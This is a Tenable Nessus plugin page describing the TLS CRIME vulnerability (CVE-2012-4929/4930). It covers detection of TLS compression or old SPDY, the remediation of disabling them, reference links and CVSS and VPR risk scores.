Transport Layer Security (TLS) Protocol CRIME Vulnerability

Low Nessus Plugin ID 62565

New! Vulnerability Priority Rating (VPR)

Tenable calculates a dynamic VPR for every vulnerability. VPR combines vulnerability information with threat intelligence and machine learning algorithms to predict which vulnerabilities are most likely to be exploited in attacks. Read more about what VPR is and how it's different from CVSS.

VPR Score: 5.9

Synopsis

The remote service has a configuration that may make it vulnerable to the CRIME attack.

Description

The remote service has one of two configurations that are known to be required for the CRIME attack :

- SSL / TLS compression is enabled.

- TLS advertises the SPDY protocol earlier than version 4.

Note that Nessus did not attempt to launch the CRIME attack against the remote service.

Solution

Disable compression and / or the SPDY service.

See Also

https://www.iacr.org/cryptodb/data/paper.php?pubkey=3091

https://discussions.nessus.org/thread/5546

http://www.nessus.org/u?c44d5826

https://bz.apache.org/bugzilla/show_bug.cgi?id=53219

Plugin Details

Severity: Low

ID: 62565

File Name: ssl_crime.nasl

Version: 1.14

Type: remote

Family: General

Published: 2012/10/16

Updated: 2019/12/04

Dependencies: 62563, 62564

Risk Information

Risk Factor: Low

VPR Score: 5.9

CVSS Score Source: CVE-2012-4930

CVSS v2.0

Base Score: 2.6

Temporal Score: 1.9

Vector: CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N

Temporal Vector: CVSS2#E:U/RL:OF/RC:C

Vulnerability Information

Required KB Items: SSL/Supported

Exploit Available: false

Exploit Ease: No known exploits are available

Vulnerability Publication Date: 2012/09/15

Reference Information

CVE: CVE-2012-4929, CVE-2012-4930

BID: 55704, 55707